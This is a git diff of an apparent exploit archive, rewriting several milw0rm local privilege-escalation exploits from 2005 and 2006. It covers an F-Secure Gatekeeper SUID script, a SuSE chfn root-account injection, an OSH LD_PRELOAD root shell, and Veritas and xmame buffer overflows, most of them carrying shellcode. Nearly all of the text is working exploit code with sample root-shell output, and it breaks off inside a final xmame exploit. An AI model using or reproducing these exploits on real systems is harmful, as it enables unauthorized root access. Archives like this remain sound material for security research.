+ elif opt == "-5":
+ _method_ = 'version_suid.cgi'
+ _file_ = 'version.cgi'
+ elif opt == "-6":
+ _method_ = 'hostname_suid.cgi'
+ _file_ = 'hostname.cgi'
+ elif opt == "-7":
+ _method_ = 'gateway_suid.cgi'
+ _file_ = 'gateway.cgi'
+ elif opt == "-8":
+ _method_ = 'halt_suid.cgi'
+ _file_ = 'halt.cgi'
+ elif opt == "-9":
+ _method_ = 'edituserdb_suid.cgi'
+ _file_ = 'edituserdb.cgi'
+ elif opt == "-10":
+ _method_ = 'htpasswd_suid.cgi'
+ _file_ = 'htpasswd.cgi'
+ elif opt == "-11":
+ _method_ = 'pattern_up_suid.cgi'
+ _file_ = 'pattern_up.cgi'
+ elif opt == "-12":
+ _method_ = 'license_suid.cgi'
+ _file_ = 'license.cgi'
+ elif opt == "-13":
+ _method_ = 'iptables_suid.cgi'
+ _file_ = 'iptables.cgi'
+ elif opt == "-14":
+ _method_ = 'dns_suid.cgi'
+ _file_ = 'dns.cgi'
+ elif opt == "-15":
+ _method_ = 'pattern_autoup_suid.cgi'
+ _file_ = 'pattern_autoup.cgi'
+ elif opt == "-16":
+ _method_ = 'spam_list_suid.cgi'
+ _file_ = 'spam_list.cgi'
+ elif opt == "-17":
+ _method_ = 'diag_suid.cgi'
+ _file_ = 'diag.cgi'
+ else:
+ pass
+
+ try:
+ opts = getopt.getopt(argv[1:], 'c1234567890s:d:', ['clean', \
+ 'suid=', \
+ 'dir='])[0]
+ except Exception, (err):
+ print "[-] 
%s" % (err),
+ raise SystemExit
+
+ _dir_ = None
+ _payload_ = None
+ _combine_ = None
+
+ for o, a in opts:
+ if o in ("-c", "--clean"):
+ _clean()
+ print "[*] done"
+ raise SystemExit
+ if o in ("-d", "--dir"):
+ if _exists(a):
+ _dir_ = a
+ else:
+ print "[-] unable to access the %s directory" % (_dir_),
+ raise SystemExit
+ if o in ("-s", "--suid"):
+ if _exists(a):
+ _payload_ = _suid(a)
+ else:
+ print "[-] unable to access binary."
+ raise SystemExit
+
+ if _dir_ == None:
+ print "[-] no directory was given [try -h for help menu]"
+ raise SystemExit
+ if _payload_ == None:
+ print "[-] enter binary to suid [try -h for help menu]"
+ raise SystemExit
+ _combined_ = "%s/%s" % (_dir_, _method_)
+ if not _exists(_combined_):
+ print "[-] method not possible, try another."
+ raise SystemExit
+
+ print "[*] creating environment..."
+ try:
+ symlink('%s/%s' % (_dir_, _method_), 'runbad')
+ _write(_file_, _payload_)
+ except Exception, err:
+ raise SystemExit
+
+
+def _suid(file):
+ _suid_ = """#!/bin/sh
+chown 0.0 %(file)s
+chmod 4755 %(file)s
+""" % (locals())
+ return _suid_
+
+
+def _clean():
+ try:
+ files = ['runbad', 'ifconfig.cgi', 'reboot.cgi', 'proxy.cgi',
+ 'edittmpl.cgi', 'version.cgi', 'hostname.cgi', 'gateway.cgi',
+ 'halt.cgi', 'edituserdb.cgi', 'htpasswd.cgi', 'pattern_up.cgi',
+ 'license.cgi', 'iptables.cgi', 'dns.cgi', 'pattern_autoup.cgi',
+ 'spam_list.cgi', 'diag_suid.cgi']
+
+ for file in files:
+ if _exists(file): unlink(file)
+
+ except Exception, err:
+ print "[-] %s" % (err),
+
+
+##############################################################################
+## main() // main code.
+##
+
+def main():
+ try:
+ print "[INFO] F-Secure Internet Gatekeeper for Linux <=2.10-431 local exploit by %s" % (__author__)
+ print "[*] handling options, arguments..."
+ _handleopts()
+ print "[*] executing exploit..."
+ system('./runbad')
+ print "[*] cleaning..."
+ _clean()
+ print "[*] done... try executing the specified binary."
+ except KeyboardInterrupt:
+ print "[-] caught keyboard interuption"
+ raise SystemExit
+ except Exception, (err):
+ _clean()
+ raise SystemExit
+
+if __name__ == '__main__': main()
+
+# milw0rm.com [2005-11-07]
diff --git a/platforms/linux/local/1299.sh b/platforms/linux/local/1299.sh
index 0afd59b0d..54dc2972b 100755
--- a/platforms/linux/local/1299.sh
+++ b/platforms/linux/local/1299.sh
@@ -1,37 +1,37 @@
-#!/bin/sh
-#
-# Exploit for SuSE Linux 9.{1,2,3}/10.0, Desktop 1.0, UnitedLinux 1.0
-# and SuSE Linux Enterprise Server {8,9} 'chfn' local root bug.
-#
-# by Hunger
-#
-# Advistory:
-# http://lists.suse.com/archive/suse-security-announce/2005-Nov/0002.html
-#
-# hunger@suse:~> id
-# uid=1000(hunger) gid=1000(hunger) groups=1000(hunger)
-# hunger@suse:~> ./susechfn.sh
-# Type your current password to get root... :)
-# Password:
-# sh-2.05b# id
-# uid=0(r00t) gid=0(root) groups=0(root)
-
-if [ X"$SHELL" = "X" ]; then
- echo "No SHELL environment, using /bin/sh for default."
- export SHELL=/bin/sh
-fi
-
-if [ -u /usr/bin/chfn ]; then
- /bin/echo "Type your current password to get root... :)"
- /usr/bin/chfn -h "`echo -e ':/:'$SHELL'\nr00t::0:0:'`" $USER > /dev/null
- if [ -u /bin/su ]; then
- /bin/su r00t
- /bin/echo "You can get root again with 'su r00t'"
- else
- echo "/bin/su file is not setuid root :("
- fi
-else
-echo "/usr/bin/chfn file is not setuid root :("
-fi
-
-# milw0rm.com [2005-11-08]
+#!/bin/sh
+#
+# Exploit for SuSE Linux 9.{1,2,3}/10.0, Desktop 1.0, UnitedLinux 1.0
+# and SuSE Linux Enterprise Server {8,9} 'chfn' local root bug.
+#
+# by Hunger
+#
+# Advistory:
+# http://lists.suse.com/archive/suse-security-announce/2005-Nov/0002.html
+#
+# hunger@suse:~> id
+# uid=1000(hunger) gid=1000(hunger) groups=1000(hunger)
+# hunger@suse:~> ./susechfn.sh
+# Type your current password to get root... :)
+# Password:
+# sh-2.05b# id
+# uid=0(r00t) gid=0(root) groups=0(root)
+
+if [ X"$SHELL" = "X" ]; then
+ echo "No SHELL environment, using /bin/sh for default."
+ export SHELL=/bin/sh
+fi
+
+if [ -u /usr/bin/chfn ]; then
+ /bin/echo "Type your current password to get root... 
:)"
+ /usr/bin/chfn -h "`echo -e ':/:'$SHELL'\nr00t::0:0:'`" $USER > /dev/null
+ if [ -u /bin/su ]; then
+ /bin/su r00t
+ /bin/echo "You can get root again with 'su r00t'"
+ else
+ echo "/bin/su file is not setuid root :("
+ fi
+else
+echo "/usr/bin/chfn file is not setuid root :("
+fi
+
+# milw0rm.com [2005-11-08]
diff --git a/platforms/linux/local/1300.sh b/platforms/linux/local/1300.sh
index 8fda60552..85632f9be 100755
--- a/platforms/linux/local/1300.sh
+++ b/platforms/linux/local/1300.sh
@@ -1,107 +1,107 @@
-#!/bin/sh
-#
-# OSH 1.7-14 Exploit
-#
-# EDUCATIONAL purposes only.... :-)
-#
-# by Charles Stevenson (core)
-#
-# Description:
-# The Operator Shell (Osh) is a setuid root, security enhanced, restricted
-# shell. It allows the administrator to carefully limit the access of special
-# commands and files to the users whose duties require their use, while
-# at the same time automatically maintaining audit records. The configuration
-# file for Osh contains an administrator defined access profile for each
-# authorized user or group.
-#
-# Problem discovered and described by Solar Eclipse:
-#
-# main.c:439
-#
-# if (gettoken(env, MAXENV)!=TWORD) {
-# fprintf(stderr,"Illegal or too long environment variable\n");
-# break;
-# }
-# if ((env2=getenv(env))==NULL) {
-# char temp[255];
-# char *temp2;
-#
-# strcpy(temp,env);
-# if ((temp2=(char *)strrchr(temp,'/'))!=NULL) {
-# if (temp2!=temp)
-# *temp2='\0';
-# else
-# *(temp2+1)='\0';
-# if ((env2=getenv(temp))!=NULL) {
-# strcat(env2,"/");
-# strcat(env2,temp2+1);
-# }
-# }
-# }
-#
-# exploit:
-#
-# This code is used to handle substitutions of environmental
-# variables. If the first call to getenv() fails, we might have a case
-# like $VAR/filename, so we find the last '/' character and replace
-# it with '\0'. Then we call getenv() on the shortened variable and
-# append "/filename" to it. The problem is that the return value of
-# getenv() is a NULL terminated string on the stack and by appending
-# to it we will overwriting the data after the string.
-#
-# This bug allows us to overwrite one of the environmental variables
-# passed to the child process. If we set the environmental variable
-# $VAR to the string "a" before executing osh, and then pass
-# "$VAR/LD_PRELOAD=evil.so" as a command line parameter, the above
-# code will overwrite the value of some environmental variable located
-# after $VAR with LD_PRELOAD=evil.so.
Then osh will execute an
-# external non-suid program and the code in evil.so will be executed.
-#
-# I have not tested this, but it looks like a really cool bug.
-#
-# Risk: Medium since user would have to be in the operator group which
-# the admin would have to grant explicitly and I assume would be
-# a trustworthy individual ;-)
-#
-# Then again the last two have been classified as "urgency=high"
-# according to Debian policy. Truly sorry to cause Oohara Yuuma
-# so much work. You really should orphan this package ;)
-#
-# Solution:
-# apt-get --purge remove osh
-#
-# greetz to solar eclipse, nemo, andrewg, arcanum, mercy, amnesia,
-# banned-it, capsyl, sloth, ben, KF, akt0r, MRX, salvia, thn
-#
-# irc.pulltheplug.org (#social)
-# 0dd: much <3 & respect
-#
-# Obligatory screenshot:
-# core@charity:~/hacking/sploits$ dpkg -l osh|grep ^ii
-# ii osh 1.7-14 Operator's Shell
-# core@charity:~/hacking/sploits$ ./x_osh3.sh
-# telnet: could not resolve /home/core/LD_PRELOAD=ownall.so/telnet: Name or service not known
-# sh-3.00# id
-# uid=0(root) gid=0(root) groups=0(root)
-
-
-cd /tmp; cat >ownall.c <
- * greetz Solar Eclipse, 0dd, irc.pulltheplug.org (#social) */
-#include
-#include
-int close(int fd) {
- gid_t groupsex = 0; /* osh isn't gettin' any tonight */
- setuid(0); /* Not really needed but make uid root */
- setgid(0); /* Set gid root too! */
- setgroups((size_t)1,&groupsex); /* This makes my pastes cooler looking */
- clearenv(); /* LD_PRELOAD was causing headaches ;) */
- execl("/bin/sh","/bin/sh",NULL);
- return 0;
-}
-EOF
-gcc -shared -o ownall.so ownall.c
-osh telnet -l '$USER/LD_LIBRARY_PATH=.' '$HOME/LD_PRELOAD=ownall.so'
-rm -f ownall*
-
-# milw0rm.com [2005-11-09]
+#!/bin/sh
+#
+# OSH 1.7-14 Exploit
+#
+# EDUCATIONAL purposes only.... :-)
+#
+# by Charles Stevenson (core)
+#
+# Description:
+# The Operator Shell (Osh) is a setuid root, security enhanced, restricted
+# shell.
It allows the administrator to carefully limit the access of special
+# commands and files to the users whose duties require their use, while
+# at the same time automatically maintaining audit records. The configuration
+# file for Osh contains an administrator defined access profile for each
+# authorized user or group.
+#
+# Problem discovered and described by Solar Eclipse:
+#
+# main.c:439
+#
+# if (gettoken(env, MAXENV)!=TWORD) {
+# fprintf(stderr,"Illegal or too long environment variable\n");
+# break;
+# }
+# if ((env2=getenv(env))==NULL) {
+# char temp[255];
+# char *temp2;
+#
+# strcpy(temp,env);
+# if ((temp2=(char *)strrchr(temp,'/'))!=NULL) {
+# if (temp2!=temp)
+# *temp2='\0';
+# else
+# *(temp2+1)='\0';
+# if ((env2=getenv(temp))!=NULL) {
+# strcat(env2,"/");
+# strcat(env2,temp2+1);
+# }
+# }
+# }
+#
+# exploit:
+#
+# This code is used to handle substitutions of environmental
+# variables. If the first call to getenv() fails, we might have a case
+# like $VAR/filename, so we find the last '/' character and replace
+# it with '\0'. Then we call getenv() on the shortened variable and
+# append "/filename" to it. The problem is that the return value of
+# getenv() is a NULL terminated string on the stack and by appending
+# to it we will overwriting the data after the string.
+#
+# This bug allows us to overwrite one of the environmental variables
+# passed to the child process. If we set the environmental variable
+# $VAR to the string "a" before executing osh, and then pass
+# "$VAR/LD_PRELOAD=evil.so" as a command line parameter, the above
+# code will overwrite the value of some environmental variable located
+# after $VAR with LD_PRELOAD=evil.so. Then osh will execute an
+# external non-suid program and the code in evil.so will be executed.
+#
+# I have not tested this, but it looks like a really cool bug.
+#
+# Risk: Medium since user would have to be in the operator group which
+# the admin would have to grant explicitly and I assume would be
+# a trustworthy individual ;-)
+#
+# Then again the last two have been classified as "urgency=high"
+# according to Debian policy. Truly sorry to cause Oohara Yuuma
+# so much work. You really should orphan this package ;)
+#
+# Solution:
+# apt-get --purge remove osh
+#
+# greetz to solar eclipse, nemo, andrewg, arcanum, mercy, amnesia,
+# banned-it, capsyl, sloth, ben, KF, akt0r, MRX, salvia, thn
+#
+# irc.pulltheplug.org (#social)
+# 0dd: much <3 & respect
+#
+# Obligatory screenshot:
+# core@charity:~/hacking/sploits$ dpkg -l osh|grep ^ii
+# ii osh 1.7-14 Operator's Shell
+# core@charity:~/hacking/sploits$ ./x_osh3.sh
+# telnet: could not resolve /home/core/LD_PRELOAD=ownall.so/telnet: Name or service not known
+# sh-3.00# id
+# uid=0(root) gid=0(root) groups=0(root)
+
+
+cd /tmp; cat >ownall.c <
+ * greetz Solar Eclipse, 0dd, irc.pulltheplug.org (#social) */
+#include
+#include
+int close(int fd) {
+ gid_t groupsex = 0; /* osh isn't gettin' any tonight */
+ setuid(0); /* Not really needed but make uid root */
+ setgid(0); /* Set gid root too! */
+ setgroups((size_t)1,&groupsex); /* This makes my pastes cooler looking */
+ clearenv(); /* LD_PRELOAD was causing headaches ;) */
+ execl("/bin/sh","/bin/sh",NULL);
+ return 0;
+}
+EOF
+gcc -shared -o ownall.so ownall.c
+osh telnet -l '$USER/LD_LIBRARY_PATH=.' '$HOME/LD_PRELOAD=ownall.so'
+rm -f ownall*
+
+# milw0rm.com [2005-11-09]
diff --git a/platforms/linux/local/1316.pl b/platforms/linux/local/1316.pl
index 1cacd3bcb..ecdd00d2f 100755
--- a/platforms/linux/local/1316.pl
+++ b/platforms/linux/local/1316.pl
@@ -1,66 +1,66 @@ -#!/usr/bin/perl -w -# -# Veritas Storage Foundation 4.0 -# -# http://www.digitalmunition.com -# kf (kf_lists[at]digitalmunition[dot]com) - 08/19/2005 -# -# This bug has not been patched as of: -# Q14438H.sf.4.0.00.0.rhel3_i686.tar.gz -# -# Make sure you don't get your sploits from some -# Frenchie at FR-SIRT go to milw0rm instead. -# -$retval = 0xbffffc17; - -$tgts{"0"} = "/opt/VRTSvcs/bin/haagent:72"; -$tgts{"1"} = "/opt/VRTSvcs/bin/haalert:72"; -$tgts{"2"} = "/opt/VRTSvcs/bin/haattr:72"; -$tgts{"3"} = "/opt/VRTSvcs/bin/hacli:72"; -$tgts{"4"} = "/opt/VRTSvcs/bin/hareg:72"; -$tgts{"5"} = "/opt/VRTSvcs/bin/haclus:72"; -$tgts{"6"} = "/opt/VRTSvcs/bin/haconf:72"; -$tgts{"7"} = "/opt/VRTSvcs/bin/hadebug:72"; -$tgts{"8"} = "/opt/VRTSvcs/bin/hagrp:72"; -$tgts{"9"} = "/opt/VRTSvcs/bin/hahb:72"; -$tgts{"10"} = "/opt/VRTSvcs/bin/halog:72"; -$tgts{"11"} = "/opt/VRTSvcs/bin/hares:72"; -$tgts{"12"} = "/opt/VRTSvcs/bin/hastatus:72"; -$tgts{"13"} = "/opt/VRTSvcs/bin/hasys:72"; -$tgts{"14"} = "/opt/VRTSvcs/bin/hatype:72"; -$tgts{"15"} = "/opt/VRTSvcs/bin/hauser:72"; -$tgts{"16"} = "/opt/VRTSvcs/bin/tststew:72"; - -unless (($target) = @ARGV) { - - print "\n Veritas Storage Foundation VCSI18N_LANG overflow, kf \(kf_lists[at]digitalmunition[dot]com\) - 08/19/2005\n"; - print "\n\nUsage: $0 \n\nTargets:\n\n"; - - foreach $key (sort(keys %tgts)) { - ($a,$b) = split(/\:/,$tgts{"$key"}); - print "\t$key . 
$a\n"; - } - - print "\n"; - exit 1; -} - -$ret = pack("l", ($retval)); -($a,$b) = split(/\:/,$tgts{"$target"}); -print "*** Target: $a, Len: $b\n\n"; - -$sc = "\x90"x1024; -$sc .= "\x31\xd2\x31\xc9\x31\xdb\x31\xc0\xb0\xa4\xcd\x80"; -$sc .= "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"; -$sc .= "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"; -$sc .= "\x80\xe8\xdc\xff\xff\xff/bin/sh"; - -$buf = "A" x $b; -$buf .= "$ret" x 2; - -$ENV{"VCSI18N_LANG"} = $buf; -$ENV{"DMR0x"} = $sc; - -exec("$a DMR0x"); - -# milw0rm.com [2005-11-12] +#!/usr/bin/perl -w +# +# Veritas Storage Foundation 4.0 +# +# http://www.digitalmunition.com +# kf (kf_lists[at]digitalmunition[dot]com) - 08/19/2005 +# +# This bug has not been patched as of: +# Q14438H.sf.4.0.00.0.rhel3_i686.tar.gz +# +# Make sure you don't get your sploits from some +# Frenchie at FR-SIRT go to milw0rm instead. +# +$retval = 0xbffffc17; + +$tgts{"0"} = "/opt/VRTSvcs/bin/haagent:72"; +$tgts{"1"} = "/opt/VRTSvcs/bin/haalert:72"; +$tgts{"2"} = "/opt/VRTSvcs/bin/haattr:72"; +$tgts{"3"} = "/opt/VRTSvcs/bin/hacli:72"; +$tgts{"4"} = "/opt/VRTSvcs/bin/hareg:72"; +$tgts{"5"} = "/opt/VRTSvcs/bin/haclus:72"; +$tgts{"6"} = "/opt/VRTSvcs/bin/haconf:72"; +$tgts{"7"} = "/opt/VRTSvcs/bin/hadebug:72"; +$tgts{"8"} = "/opt/VRTSvcs/bin/hagrp:72"; +$tgts{"9"} = "/opt/VRTSvcs/bin/hahb:72"; +$tgts{"10"} = "/opt/VRTSvcs/bin/halog:72"; +$tgts{"11"} = "/opt/VRTSvcs/bin/hares:72"; +$tgts{"12"} = "/opt/VRTSvcs/bin/hastatus:72"; +$tgts{"13"} = "/opt/VRTSvcs/bin/hasys:72"; +$tgts{"14"} = "/opt/VRTSvcs/bin/hatype:72"; +$tgts{"15"} = "/opt/VRTSvcs/bin/hauser:72"; +$tgts{"16"} = "/opt/VRTSvcs/bin/tststew:72"; + +unless (($target) = @ARGV) { + + print "\n Veritas Storage Foundation VCSI18N_LANG overflow, kf \(kf_lists[at]digitalmunition[dot]com\) - 08/19/2005\n"; + print "\n\nUsage: $0 \n\nTargets:\n\n"; + + foreach $key (sort(keys %tgts)) { + ($a,$b) = split(/\:/,$tgts{"$key"}); + print "\t$key . 
$a\n"; + } + + print "\n"; + exit 1; +} + +$ret = pack("l", ($retval)); +($a,$b) = split(/\:/,$tgts{"$target"}); +print "*** Target: $a, Len: $b\n\n"; + +$sc = "\x90"x1024; +$sc .= "\x31\xd2\x31\xc9\x31\xdb\x31\xc0\xb0\xa4\xcd\x80"; +$sc .= "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"; +$sc .= "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"; +$sc .= "\x80\xe8\xdc\xff\xff\xff/bin/sh"; + +$buf = "A" x $b; +$buf .= "$ret" x 2; + +$ENV{"VCSI18N_LANG"} = $buf; +$ENV{"DMR0x"} = $sc; + +exec("$a DMR0x"); + +# milw0rm.com [2005-11-12] diff --git a/platforms/linux/local/1412.rb b/platforms/linux/local/1412.rb index 4c7879d81..fad51a53e 100755 --- a/platforms/linux/local/1412.rb +++ b/platforms/linux/local/1412.rb 
@@ -1,34 +1,34 @@ -#!/usr/bin/ruby - -# -# One of the PoC code for xmame "-lang" options. -# Advisory is base on : http://kerneltrap.org/node/6055 -# -# by xwings at mysec dot org -# url : http://www.mysec.org , new website - -# Tested on : -# Linux debian24 2.4.27-2-386 #1 Mon May 16 16:47:51 JST 2005 i686 GNU/Linux -# gcc version 4.0.3 20060104 (prerelease) (Ubuntu 4.0.2-6ubuntu1) -# xmame 0.102 , ./configure && make && make install -# - - -#setreuid(geteuid(),geteuid()) execl(); executes /bin//sh 49 bytes. -shellcode = "\x31\xc9\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0"+ - "\x46\xcd\x80\x31\xc9\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"+ - "\x6e\x89\xe3\x51\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\xb0\x01"+ - "\x31\xdb\xcd\x80" - -vulnpath = "/usr/games/xmame.x11" -argvopt = "-lang" - -ret = (0xbfffe8da) -retadd = ([ret].pack('V')) - -nops = ("\x90" * (1056 - (shellcode.length + retadd.length))) -buffer = nops+shellcode+retadd - -system(vulnpath,argvopt,buffer) - -# milw0rm.com [2006-01-10] +#!/usr/bin/ruby + +# +# One of the PoC code for xmame "-lang" options. +# Advisory is base on : http://kerneltrap.org/node/6055 +# +# by xwings at mysec dot org +# url : http://www.mysec.org , new website + +# Tested on : +# Linux debian24 2.4.27-2-386 #1 Mon May 16 16:47:51 JST 2005 i686 GNU/Linux +# gcc version 4.0.3 20060104 (prerelease) (Ubuntu 4.0.2-6ubuntu1) +# xmame 0.102 , ./configure && make && make install +# + + +#setreuid(geteuid(),geteuid()) execl(); executes /bin//sh 49 bytes. 
+shellcode = "\x31\xc9\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0"+ + "\x46\xcd\x80\x31\xc9\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"+ + "\x6e\x89\xe3\x51\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\xb0\x01"+ + "\x31\xdb\xcd\x80" + +vulnpath = "/usr/games/xmame.x11" +argvopt = "-lang" + +ret = (0xbfffe8da) +retadd = ([ret].pack('V')) + +nops = ("\x90" * (1056 - (shellcode.length + retadd.length))) +buffer = nops+shellcode+retadd + +system(vulnpath,argvopt,buffer) + +# milw0rm.com [2006-01-10] diff --git a/platforms/linux/local/1415.c b/platforms/linux/local/1415.c index f97705172..955f11e27 100755 --- a/platforms/linux/local/1415.c +++ b/platforms/linux/local/1415.c 
@@ -1,98 +1,98 @@ -/* - Xmame 0.102 (-lang) Local Buffer Overflow Exploit - Coded BY Qnix - Qnix@bsdmail.org - #0x11 @EFNET - icq : 234263 - 0x11.org - Advisory : http://kerneltrap.org/node/6055 - -e.g: - -Qnix ~ # ./exploit /usr/games/bin/xmame.x11 -************************************************** -Xmame 0.102 (-lang) Local Buffer Overflow Exploit -Coded BY Qnix -************************************************** - - (~) Stack pointer (ESP) : 0xbffff688 - (~) Offset from ESP : 0x0 - (~) Desired Return Addr : 0xbffff688 - -GLINFO: loaded OpenGL library libGL.so! -GLINFO: loaded GLU library libGLU.so! -GLINFO: glPolygonOffsetEXT (2): not implemented ! -info: trying to parse: /usr/share/games/xmame/xmamerc -info: trying to parse: /root/.xmame/xmamerc -info: trying to parse: /usr/share/games/xmame/xmame-x11rc -info: trying to parse: /root/.xmame/xmame-x11rc -info: trying to parse: /usr/share/games/xmame/rc/robbyrc -info: trying to parse: /root/.xmame/rc/robbyrc -sh-3.00# - -*/ - -#include -#include - -#define BUFSIZE 1057 -#define NS 600 - -char shellcode[] = -"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0" -"\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d" -"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73" -"\x68"; - -unsigned long sp(void) -{ __asm__("movl %esp, %eax");} - -int main(int argc, char *argv[]) -{ - int i, offset; - long esp, ret, *addr_ptr; - char *buffer, *ptr; - - offset = 0; - esp = sp(); - ret = esp - offset; - - if(argc < 2 || argc != 2) - { - fprintf(stderr,"%s \n",argv[0]); - return(0); - } - - fprintf(stdout,"**************************************************\n"); - fprintf(stdout,"Xmame 0.102 (-lang) Local Buffer Overflow Exploit\n"); - fprintf(stdout,"Coded BY Qnix\n"); - fprintf(stdout,"**************************************************\n\n"); - fprintf(stdout,"\t(~) Stack pointer (ESP) : 0x%x\n", esp); - fprintf(stdout,"\t(~) Offset from ESP : 0x%x\n", offset); - fprintf(stdout,"\t(~) Desired Return 
Addr : 0x%x\n\n", ret); - - buffer = malloc(BUFSIZE); - - ptr = buffer; - addr_ptr = (long *) ptr; - for(i=0; i < BUFSIZE; i+=4) - { *(addr_ptr++) = ret; } - - for(i=0; i < NS; i++) - { buffer[i] = '\x90'; } - - ptr = buffer + NS; - for(i=0; i < strlen(shellcode); i++) - { *(ptr++) = shellcode[i]; } - - buffer[BUFSIZE-1] = 0; - - execl(argv[1], "xmame.x11", "-lang", buffer, 0); - - free(buffer); - - return(0); - -} - -// milw0rm.com [2006-01-13] +/* + Xmame 0.102 (-lang) Local Buffer Overflow Exploit + Coded BY Qnix + Qnix@bsdmail.org + #0x11 @EFNET + icq : 234263 + 0x11.org + Advisory : http://kerneltrap.org/node/6055 + +e.g: + +Qnix ~ # ./exploit /usr/games/bin/xmame.x11 +************************************************** +Xmame 0.102 (-lang) Local Buffer Overflow Exploit +Coded BY Qnix +************************************************** + + (~) Stack pointer (ESP) : 0xbffff688 + (~) Offset from ESP : 0x0 + (~) Desired Return Addr : 0xbffff688 + +GLINFO: loaded OpenGL library libGL.so! +GLINFO: loaded GLU library libGLU.so! +GLINFO: glPolygonOffsetEXT (2): not implemented ! 
+info: trying to parse: /usr/share/games/xmame/xmamerc +info: trying to parse: /root/.xmame/xmamerc +info: trying to parse: /usr/share/games/xmame/xmame-x11rc +info: trying to parse: /root/.xmame/xmame-x11rc +info: trying to parse: /usr/share/games/xmame/rc/robbyrc +info: trying to parse: /root/.xmame/rc/robbyrc +sh-3.00# + +*/ + +#include +#include + +#define BUFSIZE 1057 +#define NS 600 + +char shellcode[] = +"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0" +"\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d" +"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73" +"\x68"; + +unsigned long sp(void) +{ __asm__("movl %esp, %eax");} + +int main(int argc, char *argv[]) +{ + int i, offset; + long esp, ret, *addr_ptr; + char *buffer, *ptr; + + offset = 0; + esp = sp(); + ret = esp - offset; + + if(argc < 2 || argc != 2) + { + fprintf(stderr,"%s \n",argv[0]); + return(0); + } + + fprintf(stdout,"**************************************************\n"); + fprintf(stdout,"Xmame 0.102 (-lang) Local Buffer Overflow Exploit\n"); + fprintf(stdout,"Coded BY Qnix\n"); + fprintf(stdout,"**************************************************\n\n"); + fprintf(stdout,"\t(~) Stack pointer (ESP) : 0x%x\n", esp); + fprintf(stdout,"\t(~) Offset from ESP : 0x%x\n", offset); + fprintf(stdout,"\t(~) Desired Return Addr : 0x%x\n\n", ret); + + buffer = malloc(BUFSIZE); + + ptr = buffer; + addr_ptr = (long *) ptr; + for(i=0; i < BUFSIZE; i+=4) + { *(addr_ptr++) = ret; } + + for(i=0; i < NS; i++) + { buffer[i] = '\x90'; } + + ptr = buffer + NS; + for(i=0; i < strlen(shellcode); i++) + { *(ptr++) = shellcode[i]; } + + buffer[BUFSIZE-1] = 0; + + execl(argv[1], "xmame.x11", "-lang", buffer, 0); + + free(buffer); + + return(0); + +} + +// milw0rm.com [2006-01-13] diff --git a/platforms/linux/local/1425.c b/platforms/linux/local/1425.c index a928a2766..5c556aa21 100755 --- a/platforms/linux/local/1425.c +++ b/platforms/linux/local/1425.c 
@@ -1,112 +1,112 @@ -/* xmame-expl.c - * by - * sj (sj@2600.com) - * - * On 20th of Jan it came to my attention that Xmame suffered from several - * buffer overflow problems. Thinking this issue was resolved, I installed - * Xmame on my Ubuntu laptop, from the Ubuntu repositories which installed a - * vulnerable version of Xmame. - * This is what prompted me to write this exploit. I realise there is a - * ruby exploit out there, but that did not exploit my system, hence - * another reason to write this exploit. - * - * This code exploits Xmame 0.102 and below. - * - * The shellcode used in this exploit is taken from Mixter's buffer - * overflow tutorial which can be found here: http://mixter.void.ru/exploit.html - * - * Based on what arguments you supply, this code will exploit 3 of - * the vulnerabilities found in Xmame giving you an euid=0 - * Read the usage. - * - * Example: - * sj@tsunami:~/audit$ gcc -o xmame-expl xmame-expl.c - * sj@tsunami:~/audit$ ./xmame-expl 1 - * Using -pb overflow method - * info: trying to parse: /etc/xmame/xmamerc - * error: /etc/xmame/xmamerc(71): unknown option joyusb-calibrate, ignoring line - * info: trying to parse: /home/sj/.xmame/xmamerc - * info: trying to parse: /etc/xmame/xmame-x11rc - * info: trying to parse: /home/sj/.xmame/xmame-x11rc - * sh-3.00$ id - * uid=1000(sj) gid=1000(sj) egid=0(root) - * groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(lpadmin),108(scanner),109(admin),1000(sj) - * sh-3.00$ - * - * Enjoy (: - */ - -#include -#include - -char shellcode[]="\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d" - "\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58"; - -unsigned long sp(void) -{__asm__("movl %esp, %eax");} - -void usage() { - fprintf(stderr,"Usage: ./xmame-expl \n"); - fprintf(stderr,"buffers:\n -pb [1]"); - fprintf(stderr,"\n -lang [2]"); - fprintf(stderr,"\n -rec [3]"); - fprintf(stderr,"\nExample: 
